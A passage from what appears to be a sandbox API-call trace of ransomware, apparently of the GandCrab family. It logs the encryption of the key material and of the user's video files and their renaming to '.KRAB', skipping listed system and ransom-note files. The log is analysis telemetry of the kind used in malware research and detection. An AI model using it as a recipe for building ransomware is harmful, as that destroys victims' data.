szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011678) returned 1 [0098.486] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.486] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.486] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.486] CryptGenRandom (in: hProv=0x1011678, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0098.486] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0098.486] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.487] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0098.487] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0098.487] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.487] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.488] GetLastError () returned 0x0 [0098.488] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0098.488] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.488] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010f08) returned 1 [0098.488] CryptImportKey (in: hProv=0x1010f08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0098.488] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.488] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.488] GetLastError () returned 0x0 [0098.488] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0098.488] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0098.488] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\DTAVJefrIDMBlRs.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\dtavjefridmblrs.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0098.489] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0098.489] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0098.490] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x6112, lpOverlapped=0x0) returned 1 [0098.508] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff9eee, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.508] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x6112, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x6112, lpOverlapped=0x0) returned 1 [0098.508] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0098.508] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.512] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.512] CloseHandle (hObject=0x434) returned 1 [0098.512] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.513] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\DTAVJefrIDMBlRs.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\dtavjefridmblrs.mp4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\DTAVJefrIDMBlRs.mp4.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\dtavjefridmblrs.mp4.krab")) returned 1 [0098.513] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.514] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.514] lstrcmpW (lpString1="gdDM rSXWI6cQL.mp4", lpString2=".") returned 1 [0098.514] lstrcmpW (lpString1="gdDM rSXWI6cQL.mp4", lpString2="..") returned 1 [0098.514] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="gdDM rSXWI6cQL.mp4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\gdDM rSXWI6cQL.mp4") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\gdDM rSXWI6cQL.mp4" [0098.514] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.514] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\gdDM rSXWI6cQL.mp4.KRAB") returned 52 [0098.514] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\gdDM rSXWI6cQL.mp4") returned 47 [0098.514] lstrlenW (lpString=".mp4") returned 4 [0098.514] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.515] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mp4 ") returned 5 [0098.515] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.515] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\gdDM rSXWI6cQL.mp4") returned 47 [0098.515] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\gdDM rSXWI6cQL.mp4") returned 47 [0098.515] lstrcmpiW (lpString1="gdDM rSXWI6cQL.mp4", lpString2="desktop.ini") returned 1 [0098.515] lstrcmpiW (lpString1="gdDM rSXWI6cQL.mp4", lpString2="autorun.inf") returned 1 [0098.515] lstrcmpiW (lpString1="gdDM rSXWI6cQL.mp4", lpString2="ntuser.dat") returned -1 [0098.515] lstrcmpiW (lpString1="gdDM rSXWI6cQL.mp4", lpString2="iconcache.db") returned -1 [0098.515] lstrcmpiW (lpString1="gdDM rSXWI6cQL.mp4", lpString2="bootsect.bak") returned 1 [0098.515] lstrcmpiW (lpString1="gdDM rSXWI6cQL.mp4", lpString2="boot.ini") returned 1 [0098.515] lstrcmpiW (lpString1="gdDM rSXWI6cQL.mp4", lpString2="ntuser.dat.log") returned -1 [0098.515] lstrcmpiW (lpString1="gdDM rSXWI6cQL.mp4", lpString2="thumbs.db") returned -1 [0098.515] lstrcmpiW (lpString1="gdDM rSXWI6cQL.mp4", lpString2="KRAB-DECRYPT.html") returned -1 [0098.515] lstrcmpiW (lpString1="gdDM rSXWI6cQL.mp4", lpString2="KRAB-DECRYPT.txt") returned -1 [0098.515] lstrcmpiW (lpString1="gdDM rSXWI6cQL.mp4", lpString2="CRAB-DECRYPT.txt") returned 1 [0098.515] lstrcmpiW (lpString1="gdDM rSXWI6cQL.mp4", lpString2="ntldr") returned -1 [0098.515] lstrcmpiW (lpString1="gdDM rSXWI6cQL.mp4", lpString2="NTDETECT.COM") returned -1 [0098.515] lstrcmpiW (lpString1="gdDM rSXWI6cQL.mp4", lpString2="Bootfont.bin") returned 1 [0098.515] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.516] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011898) returned 1 [0098.516] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.517] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.518] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.518] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0098.518] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0098.518] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.518] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0098.519] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.519] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.519] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.519] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0098.519] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.519] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.520] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10112c0) returned 1 [0098.520] CryptImportKey (in: hProv=0x10112c0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0098.520] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.520] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.521] GetLastError () returned 0x0 [0098.521] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0098.521] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0098.521] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10111b0) returned 1 [0098.521] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0098.521] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.521] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.522] GetLastError () returned 0x0 [0098.522] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0098.522] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0098.522] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\gdDM rSXWI6cQL.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\gddm rsxwi6cql.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0098.522] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0098.523] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0098.523] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x8d32, lpOverlapped=0x0) returned 1 [0098.535] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff72ce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.535] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x8d32, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x8d32, lpOverlapped=0x0) returned 1 [0098.536] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0098.536] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.603] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.603] CloseHandle (hObject=0x434) returned 1 [0098.603] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.604] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\gdDM rSXWI6cQL.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\gddm rsxwi6cql.mp4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\gdDM rSXWI6cQL.mp4.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\gddm rsxwi6cql.mp4.krab")) returned 1 [0098.605] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.605] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.605] lstrcmpW (lpString1="h0 0epvFfjNglYIr--X.avi", lpString2=".") returned 1 [0098.605] lstrcmpW (lpString1="h0 0epvFfjNglYIr--X.avi", lpString2="..") returned 1 [0098.605] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="h0 0epvFfjNglYIr--X.avi" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\h0 0epvFfjNglYIr--X.avi") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\h0 0epvFfjNglYIr--X.avi" [0098.606] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.606] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\h0 0epvFfjNglYIr--X.avi.KRAB") returned 57 [0098.607] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\h0 0epvFfjNglYIr--X.avi") returned 52 [0098.615] lstrlenW (lpString=".avi") returned 4 [0098.615] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.616] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".avi ") returned 5 [0098.616] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.616] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\h0 0epvFfjNglYIr--X.avi") returned 52 [0098.616] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\h0 0epvFfjNglYIr--X.avi") returned 52 [0098.616] lstrcmpiW (lpString1="h0 0epvFfjNglYIr--X.avi", lpString2="desktop.ini") returned 1 [0098.616] lstrcmpiW (lpString1="h0 0epvFfjNglYIr--X.avi", lpString2="autorun.inf") returned 1 [0098.616] lstrcmpiW (lpString1="h0 0epvFfjNglYIr--X.avi", lpString2="ntuser.dat") returned -1 [0098.616] lstrcmpiW (lpString1="h0 0epvFfjNglYIr--X.avi", lpString2="iconcache.db") returned -1 [0098.616] lstrcmpiW (lpString1="h0 0epvFfjNglYIr--X.avi", lpString2="bootsect.bak") returned 1 [0098.616] lstrcmpiW (lpString1="h0 0epvFfjNglYIr--X.avi", lpString2="boot.ini") returned 1 [0098.616] lstrcmpiW (lpString1="h0 0epvFfjNglYIr--X.avi", lpString2="ntuser.dat.log") returned -1 [0098.616] lstrcmpiW (lpString1="h0 0epvFfjNglYIr--X.avi", lpString2="thumbs.db") returned -1 [0098.616] lstrcmpiW (lpString1="h0 0epvFfjNglYIr--X.avi", lpString2="KRAB-DECRYPT.html") returned -1 [0098.616] lstrcmpiW (lpString1="h0 0epvFfjNglYIr--X.avi", lpString2="KRAB-DECRYPT.txt") returned -1 [0098.616] lstrcmpiW (lpString1="h0 0epvFfjNglYIr--X.avi", lpString2="CRAB-DECRYPT.txt") returned 1 [0098.616] lstrcmpiW (lpString1="h0 0epvFfjNglYIr--X.avi", lpString2="ntldr") returned -1 [0098.616] lstrcmpiW (lpString1="h0 0epvFfjNglYIr--X.avi", lpString2="NTDETECT.COM") returned -1 [0098.617] lstrcmpiW (lpString1="h0 0epvFfjNglYIr--X.avi", lpString2="Bootfont.bin") returned 1 [0098.617] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.617] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10110a0) returned 1 [0098.617] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.618] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.618] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.618] CryptGenRandom (in: hProv=0x10110a0, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0098.618] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0098.618] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.618] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011018) returned 1 [0098.619] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0098.619] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0098.619] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0098.619] CryptGenRandom (in: hProv=0x1011018, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0098.619] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0098.619] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.620] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011678) returned 1 [0098.620] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0098.620] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.620] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.620] GetLastError () returned 0x0 [0098.621] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0098.621] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0098.621] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0098.621] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd920) returned 1 [0098.621] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0098.621] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0098.621] GetLastError () returned 0x0 [0098.621] CryptDestroyKey (hKey=0xfbd920) returned 1 [0098.621] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0098.621] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\h0 0epvFfjNglYIr--X.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\h0 0epvffjnglyir--x.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0098.622] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0098.622] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0098.623] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x11fae, lpOverlapped=0x0) returned 1 [0098.636] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffee052, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.636] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x11fae, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x11fae, lpOverlapped=0x0) returned 1 [0098.636] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0098.636] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.639] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.640] CloseHandle (hObject=0x434) returned 1 [0098.640] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.640] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\h0 0epvFfjNglYIr--X.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\h0 0epvffjnglyir--x.avi"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\h0 0epvFfjNglYIr--X.avi.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\h0 0epvffjnglyir--x.avi.krab")) returned 1 [0098.641] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.641] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0098.641] lstrcmpW (lpString1="hFvoPiEIjgGSSo.mkv", lpString2=".") returned 1 [0098.641] lstrcmpW (lpString1="hFvoPiEIjgGSSo.mkv", lpString2="..") returned 1 [0098.641] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="hFvoPiEIjgGSSo.mkv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\hFvoPiEIjgGSSo.mkv") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\hFvoPiEIjgGSSo.mkv" [0098.641] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.641] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\hFvoPiEIjgGSSo.mkv.KRAB") returned 52 [0098.641] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\hFvoPiEIjgGSSo.mkv") returned 47 [0098.641] lstrlenW (lpString=".mkv") returned 4 [0098.641] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.641] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mkv ") returned 5 [0098.641] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.642] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\hFvoPiEIjgGSSo.mkv") returned 47 [0098.642] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\hFvoPiEIjgGSSo.mkv") returned 47 [0098.642] lstrcmpiW (lpString1="hFvoPiEIjgGSSo.mkv", lpString2="desktop.ini") returned 1 [0098.642] lstrcmpiW (lpString1="hFvoPiEIjgGSSo.mkv", lpString2="autorun.inf") returned 1 [0098.642] lstrcmpiW (lpString1="hFvoPiEIjgGSSo.mkv", lpString2="ntuser.dat") returned -1 [0098.642] lstrcmpiW (lpString1="hFvoPiEIjgGSSo.mkv", lpString2="iconcache.db") returned -1 [0098.642] lstrcmpiW (lpString1="hFvoPiEIjgGSSo.mkv", lpString2="bootsect.bak") returned 1 [0098.642] lstrcmpiW (lpString1="hFvoPiEIjgGSSo.mkv", lpString2="boot.ini") returned 1 [0098.642] lstrcmpiW (lpString1="hFvoPiEIjgGSSo.mkv", lpString2="ntuser.dat.log") returned -1 [0098.642] lstrcmpiW (lpString1="hFvoPiEIjgGSSo.mkv", lpString2="thumbs.db") returned -1 [0098.642] lstrcmpiW (lpString1="hFvoPiEIjgGSSo.mkv", lpString2="KRAB-DECRYPT.html") returned -1 [0098.642] lstrcmpiW (lpString1="hFvoPiEIjgGSSo.mkv", lpString2="KRAB-DECRYPT.txt") returned -1 [0098.642] lstrcmpiW (lpString1="hFvoPiEIjgGSSo.mkv", lpString2="CRAB-DECRYPT.txt") returned 1 [0098.642] lstrcmpiW (lpString1="hFvoPiEIjgGSSo.mkv", lpString2="ntldr") returned -1 [0098.642] lstrcmpiW (lpString1="hFvoPiEIjgGSSo.mkv", lpString2="NTDETECT.COM") returned -1 [0098.642] lstrcmpiW (lpString1="hFvoPiEIjgGSSo.mkv", lpString2="Bootfont.bin") returned 1 [0098.642] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.642] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: 